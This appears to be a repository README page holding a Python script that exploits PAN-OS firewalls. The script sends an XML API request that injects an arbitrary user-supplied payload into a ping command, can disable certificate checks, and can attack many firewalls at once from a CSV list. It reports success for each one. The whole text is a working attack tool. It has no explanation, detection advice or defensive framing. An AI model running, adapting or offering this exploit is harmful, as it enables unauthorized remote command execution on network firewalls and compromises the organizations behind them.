README.md
Rendering markdown...
import csv
import requests
def exploit_firewall(target_ip, payload, root_ca=None):
url = f"https://{target_ip}/api/"
data = f"""<?xml version="1.0" encoding="UTF-8"?>
<request>
<op cmd="test" />
<cmd code="ping">{payload}</cmd>
</request>"""
headers = {
"User-Agent": "PAN-OS-Exploit",
"Content-Type": "application/xml"
}
try:
if root_ca:
response = requests.post(url, headers=headers, data=data, timeout=5, verify=root_ca)
else:
response = requests.post(url, headers=headers, data=data, timeout=5, verify=False)
response.raise_for_status()
if "Success" in response.text:
print(f"Exploited successfully against {target_ip}!")
else:
print(f"Exploit failed for {target_ip}.")
print("Response:")
print(response.text)
except requests.exceptions.RequestException as e:
print(f"Failed to exploit {target_ip}: {e}")
def main():
choice = input("Do you want to enter values directly (D) or use a CSV file (C)? ").strip().lower()
if choice == 'd':
while True:
target_ip = input("Enter the IP address of the vulnerable PAN-OS firewall (or 'q' to quit): ")
if target_ip.lower() == 'q':
break
root_ca = input("Enter the path to the root CA certificate (leave blank to disable certificate verification): ").strip()
payload = input("Enter the payload to execute: ")
exploit_firewall(target_ip, payload, root_ca)
elif choice == 'c':
csv_file = input("Enter the path to the CSV file: ")
with open(csv_file, newline='') as csvfile:
reader = csv.reader(csvfile)
next(reader) # Skip header row if present
for row in reader:
target_ip, payload, root_ca = row
exploit_firewall(target_ip, payload, root_ca)
else:
print("Invalid choice. Please enter 'D' for entering values directly or 'C' for using a CSV file.")
if __name__ == "__main__":
main()